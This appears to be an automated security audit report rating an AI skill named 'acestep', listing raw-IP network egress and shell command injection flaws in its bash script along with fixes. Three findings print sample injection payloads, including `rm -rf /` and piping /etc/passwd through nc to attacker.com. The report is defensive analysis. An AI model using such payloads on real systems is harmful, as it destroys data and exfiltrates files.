Trust Assessment
acestep received a trust score of 10/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 11 findings: 10 critical, 1 high, 0 medium, and 0 low severity. Key findings include Network egress to untrusted endpoints, Shell Command Injection in `set_config` via unescaped `jq` argument, Shell Command Injection via unvalidated `api_url` in `curl` calls.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The Manifest Analysis layer scored lowest at 0/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (11)
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Network egress to untrusted endpoints: HTTP request to raw IP address. Review all outbound network calls. Remove connections to webhook collectors, paste sites, and raw IP addresses. Legitimate API calls should use well-known service domains. | Manifest | skills/dumoedss/acestep/SKILL.md:80 | |
| CRITICAL | Network egress to untrusted endpoints: HTTP request to raw IP address. Review all outbound network calls. Remove connections to webhook collectors, paste sites, and raw IP addresses. Legitimate API calls should use well-known service domains. | Manifest | skills/dumoedss/acestep/SKILL.md:101 | |
| CRITICAL | Network egress to untrusted endpoints: HTTP request to raw IP address. Review all outbound network calls. Remove connections to webhook collectors, paste sites, and raw IP addresses. Legitimate API calls should use well-known service domains. | Manifest | skills/dumoedss/acestep/SKILL.md:137 | |
| CRITICAL | Network egress to untrusted endpoints: HTTP request to raw IP address. Review all outbound network calls. Remove connections to webhook collectors, paste sites, and raw IP addresses. Legitimate API calls should use well-known service domains. | Manifest | skills/dumoedss/acestep/SKILL.md:235 | |
| CRITICAL | Network egress to untrusted endpoints: HTTP request to raw IP address. Review all outbound network calls. Remove connections to webhook collectors, paste sites, and raw IP addresses. Legitimate API calls should use well-known service domains. | Manifest | skills/dumoedss/acestep/SKILL.md:251 | |
| CRITICAL | Network egress to untrusted endpoints: HTTP request to raw IP address. Review all outbound network calls. Remove connections to webhook collectors, paste sites, and raw IP addresses. Legitimate API calls should use well-known service domains. | Manifest | skills/dumoedss/acestep/scripts/acestep.sh:29 | |
| CRITICAL | Network egress to untrusted endpoints: HTTP request to raw IP address. Review all outbound network calls. Remove connections to webhook collectors, paste sites, and raw IP addresses. Legitimate API calls should use well-known service domains. | Manifest | skills/dumoedss/acestep/scripts/acestep.sh:73 | |
| CRITICAL | Network egress to untrusted endpoints: HTTP request to raw IP address. Review all outbound network calls. Remove connections to webhook collectors, paste sites, and raw IP addresses. Legitimate API calls should use well-known service domains. | Manifest | skills/dumoedss/acestep/scripts/config.json:2 | |
| CRITICAL | Shell Command Injection in `set_config` via unescaped `jq` argument. The `set_config` function in `scripts/acestep.sh` constructs a `jq` command string by directly interpolating the `$value` variable without proper shell or JSON escaping. An attacker can inject arbitrary shell commands by providing a malicious string to the `config --set` command (e.g., `acestep.sh config --set api_url "http://example.com\"; rm -rf /; echo \""`), which will be executed by the shell before `jq` processes it. This allows for arbitrary code execution on the host system. Use `jq --arg` or `jq --argjson` to pass values safely, preventing shell interpretation and ensuring proper JSON escaping. For example, `jq --arg key "$key" --arg value "$value" '.[$key] = $value'` for string values. | LLM | scripts/acestep.sh:130 | |
| CRITICAL | Shell Command Injection via unvalidated `api_url` in `curl` calls. The `api_url` variable, which can be set by user input via the `config --set api_url` command (and is vulnerable to injection itself), is directly interpolated into `curl` commands (e.g., in `check_health`, `cmd_health`, `cmd_generate`, `cmd_status`, `cmd_models`). If an attacker sets `api_url` to a string containing shell metacharacters (e.g., `http://example.com/health; rm -rf /`), these commands will be executed when the `curl` command is invoked. The `ensure_connection` function's health check does not sanitize the URL for shell injection. Sanitize the `api_url` to ensure it contains only valid URL characters before using it in shell commands. Alternatively, use `curl`'s `--url` option (e.g., `curl --url "$url/health"`) which treats the argument as a literal URL and prevents shell interpretation of its contents. | LLM | scripts/acestep.sh:160 | |
| HIGH | Potential Credential Exposure/Exfiltration via unescaped `api_key` in `Authorization` header. The `api_key` is loaded from `config.json` and directly interpolated into the `Authorization` header string within the `build_auth_header` function: `-H "Authorization: Bearer ${api_key}"`. If an attacker can set a malicious `api_key` (e.g., via the `set_config` command injection) containing shell metacharacters like `"; cat /etc/passwd \| nc attacker.com 80; echo "`, it could lead to the execution of arbitrary commands and exfiltration of sensitive data, including the API key itself or other system files. Ensure that `api_key` values are properly sanitized or escaped before being interpolated into shell command strings. The safest approach is to use `curl`'s `-H` option with a literal string and ensure the `api_key` itself is validated to prevent shell metacharacters. | LLM | scripts/acestep.sh:150 | |